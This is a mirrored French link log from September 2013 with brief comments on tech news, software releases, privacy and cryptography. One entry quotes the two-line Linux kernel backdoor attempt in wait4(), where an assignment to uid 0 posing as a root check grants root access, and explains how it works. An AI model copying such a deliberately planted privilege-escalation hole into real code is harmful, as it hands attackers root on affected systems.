PROJET AUTOBLOG


shaarli-Liens en vrac de sebsauvage

Site original : shaarli-Liens en vrac de sebsauvage
⇐ retour index

Mojang | Future OpenGL support

jeudi 26 septembre 2013 à 21:40
Ah... pas cool. Dans le futur, un paquet d'ordinateur ne pourront plus faire tourner Minecraft: Il faudra OpenGL 2.1 minimum. Or cette version d'OpenGL n'est pas forcément disponible partout. Dommage.
(Permalink)

Source : https://help.mojang.com/customer/portal/articles/1307761-future-opengl-support


Orchid mantis

jeudi 26 septembre 2013 à 16:10
Woao... étonnant.
(Permalink)

Source : http://i.imgur.com/tnavfvU.jpg


Serge Dassault veut aussi son effet Streisand en attaquant Mediapart

jeudi 26 septembre 2013 à 16:05
Tiens, encore un qui va goûter à l'effet Streisand.
(Permalink)

Source : http://www.numerama.com/magazine/27091-serge-dassault-veut-aussi-son-effet-streisand-en-attaquant-mediapart.html


git concepts simplified

jeudi 26 septembre 2013 à 16:00
git expliqué avec des schémas.
(Permalink)

Source : http://gitolite.com/gcs/index.html


Serpent

jeudi 26 septembre 2013 à 13:45
Mais euh... ça a l'air tellement facile comme ça. C'est pas juste.
(Permalink)

Source : http://i.imgur.com/1uM0DPV.gif


Google's latest PRIVACY MELTDOWN: Web chats sent to WRONG people • The Register

jeudi 26 septembre 2013 à 13:21
Oups... gros cafouillage de Google dans GTalk: les messages sont envoyés aux mauvaises personnes ><
Détails: http://bigbrowser.blog.lemonde.fr/2013/09/26/breche-serieux-bug-de-la-discussion-instantanee-de-gmail/#xtor=RSS-32280322
(Permalink)

Source : http://www.theregister.co.uk/2013/09/26/google_gchat_messages_tangled/


Les pages jaunes me font voir rouge - romy.tetue.net

jeudi 26 septembre 2013 à 11:35
Vous voulez vous retirer de l'annuaire (Page Blanche) ? Non seulement c'est une galère, mais apprêtez-vous à être spammé à mort !  
Et oui, France Télécom a vendu les Pages Jaunes à un fond d'investissement américain  ><.
Le produit vendu par les Pages Jaunes, c'est vous !
(via Rezo.net)
(Permalink)

Source : http://romy.tetue.net/les-pages-jaunes-me-font-voir-rouge


[Firefox] Gestion des profils

jeudi 26 septembre 2013 à 10:19
Si vous avez besoin de travailler avec plusieurs profils dans Firefox, voici les lignes de commande.
(Permalink)

Source : http://id-libre.org/shaarli/?gsNMLg


Annuaire de Shaarlis

jeudi 26 septembre 2013 à 09:45
Oui, il n'y a toujours pas d'annuaire de Shaarlis. Il faudrait y réfléchir.
(Permalink)

Source : http://gilles.wittezaele.fr/paste/?ddd3e93511c383a9#NV/SqqjXIfzY03rVmOe5cn0/AFPqTmrR9Q11u93WsCA=


VideoLAN - VLC 2.1 Rincewind

jeudi 26 septembre 2013 à 09:15
Nouvelle grosse version de VLC.  Notre fidèle VLC.
(Permalink)

Source : http://www.videolan.org/vlc/releases/2.1.0.html


Jackie Chan just posted this on his Facebook - Imgur

mercredi 25 septembre 2013 à 23:29
Haha ! Trop bon... Jackie Chan a posté ceci sur sa page Facebook: Il vient de découvrir qu'il est un mème.  :-D
(https://www.facebook.com/photo.php?fbid=10151946646137318&set=a.98876792317.90092.30382852317&type=1)
(Permalink)

Source : http://imgur.com/WH5pwfZ


hypocentre -short film- in Vimeo Staff Picks on Vimeo

mercredi 25 septembre 2013 à 22:39
Imaginez Paris... totalement vidé de ses habitants.   Un peu flippant.
(Permalink)

Source : http://vimeo.com/74857458


[Shaarli] Quelques modifications

mercredi 25 septembre 2013 à 21:56
Bon, après les QR-Code qui n'utilisent plus ni jQuery, ni un service externe, j'ai également viré jQuery de la quasi-totalité des pages. (jQuery n'est désormais inclus que dans les pages qui en ont vraiment besoin. Et pour ces pages, il sera dégagé plus tard en réimplémentant les autocompletes et autres).
Gain immédiat: 289 kilo-octets en moins par page !   \o/

Pour mettre à jour, récupérer la dernière version (https://github.com/sebsauvage/Shaarli/archive/master.zip). Supprimez tout sauf votre répertoire "data" et dézippez cette version.
(Permalink)

Source : https://github.com/sebsauvage/Shaarli?date=20130925


Mailbox App for iOS Automatically Executes Javascript | Threatpost

mercredi 25 septembre 2013 à 20:18
Quel espèce de crétin développe une application de mail qui exécute automatiquement tout javascript inclus dans les mails reçus ?  SÉRIEUSEMENT ???  ><
EDIT: Voir aussi http://nakedsecurity.sophos.com/2013/09/26/mailbox-app-on-ipads-and-iphones-runs-javascript-from-emails-vulnerability-or-feature/
(Permalink)

Source : http://threatpost.com/javascript-issue-plagues-mailbox-app-for-ios/102406


An attempt to backdoor the kernel [LWN.net]

mercredi 25 septembre 2013 à 17:16
Ça ressemble à quoi une backdoor dans un Kernel linux ?
C'est aussi simple que remplacer "==" par "=" comme cela a été fait dans ces deux lignes de code:
      if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
                      retval = -EINVAL;

Ce qui ressemblait à l'origine à un contrôle de droits ("L'utilisateur est-il bien root ?") devient "On DONNE les droits root".
Donc n'importe qui qui aurait appelé cette fonction système wait4() avec ces deux flags actifs aurait obtenu l'accès root.

Un seul caractère supprimé, et voilà une backdoor pour obtenir l'accès root sur un système.  Devil is in the details.
(Permalink)

Source : http://lwn.net/Articles/57135/


End of support for Java SE 6 - Microsoft Malware Protection Center - Site Home - TechNet Blogs

mercredi 25 septembre 2013 à 16:19
Juste un rappel: Java 6 n'est plus supporté par Oracle depuis février 2013. Ce qui veut dire plus de mises à jour de sécurité.
Même si vous avez installé Java 7, Java 6 n'est pas automatiquement supprimé. Pensez bien à le déinstaller.
(Permalink)

Source : https://blogs.technet.com/b/mmpc/archive/2013/09/24/end-of-support-for-java-se-6.aspx?Redirected=true


Just 2 minutes | CommitStrip - Blog relating the daily life of web agencies developers

mercredi 25 septembre 2013 à 15:59
C'est exactement ça. Y'a des moments des modifs qui devraient être simples deviennent un vrai parcours du combattant.
(Permalink)

Source : http://www.commitstrip.com/fr/2013/09/24/yen-a-pour-2-minutes/


Chargement dynamique de librairie Javascript (à la demande)

mercredi 25 septembre 2013 à 15:30
Voici un exemple minimaliste de création d'un QR-Code avec une lib javascript (http://neocotic.com/qr.js). Cliquez le bouton, ça génère un QR-Code.
Rien d'extraordinaire, mais c'est codé de manière à ce que la lib ne soit chargée dans la page *que* si le bouton est cliqué.

J'ai fait la même chose dans Shaarli: Cette lib est désormais utilisée pour générer le QR-Code au lieu de faire appel à un service externe (c'est mieux pour la protection de la vie privée.)
Mais en utilisant cette petite bidouille, on évite totalement de charger la lib dans chaque page. Elle n'est chargée que si on en a besoin.
Certes c'est une petite économie (11 ko), mais c'est toujours ça de gagné.
(oui promis je vais faire de mon mieux pour virer jQuery de Shaarli.)
(cf. commit https://github.com/sebsauvage/Shaarli/commit/af77b2fd9a574ba03b309ea0799946fabf37c7d1)

J'imagine qu'on doit pouvoir rendre ça plus générique, mais franchement le javascript me gave...
(Permalink)

Source : http://sebsauvage.net/paste/?61de6babdaaee5e0#SKfFj38Pzqq678hHs7mlwlVcGn7GMEUTtftHqAAiJ80=


What the heck is going on with NIST’s cryptographic standard, SHA-3? | Center for Democracy & Technology

mercredi 25 septembre 2013 à 09:51
(Attention, je vais encore parler crypto).

Contexte: Le NIST standardise des algorithmes cryptographiques, tels que les algorithmes de hashage SHA-1 et SHA-2 (aussi connu sous les noms SHA-256, SHA-512...).
Différents algos étaient en compétition depuis 5 ans pour définir le nouveau standard SHA-3. Après beaucoup d'analyses, c'est l'algo "Keccak" qui a été retenu. Bien.

Pour en faire un standard, le NIST a donc créé une implémentation de référence à partir du whitepaper original. Gros soucis: Ils ont modifié substantiellement l'algo d'origine. Des modifications internes assez peu compréhensibles et qu'ils n'ont pas clairement justifiées. Et ils ont également réduit sa taille (L'algo d'origine produisait 224, 256, 384 et 512 bits. La nouvelle version seulement 128 et 256 bits.). Ce qui en fait un algo qui - au final - n'est pas plus sûr que SHA-2.

L'autre soucis, c'est que les modifications en font un algo très différent du Keccak d'origine, et rend donc caduc toutes les analyses cryptographiques de l'algo d'origine. On ne sait donc rien de la sécurité de ce nouvel algo, alors que sa sélection était le résultat de 5 ans de compétition et d'analyse avec ses concurrents.

Dans le contexte actuel, tout cela semble terriblement louche à la communauté crypto.  On a pas fini d'en entendre parler.

EDIT: Un avis de quelqu'un plus compétent que moi sur le sujet: http://hemltreppler.net/shaarli/?D6LOBA
(Permalink)

Source : https://www.cdt.org/blogs/joseph-lorenzo-hall/2409-nist-sha-3


Lieux des tournages des Star Wars - Choses vues, sur le web et ailleurs

mardi 24 septembre 2013 à 23:05
Woao... quelle dévotion.
(Permalink)

Source : http://sammyfisherjr.net/Shaarli/?_VL7vA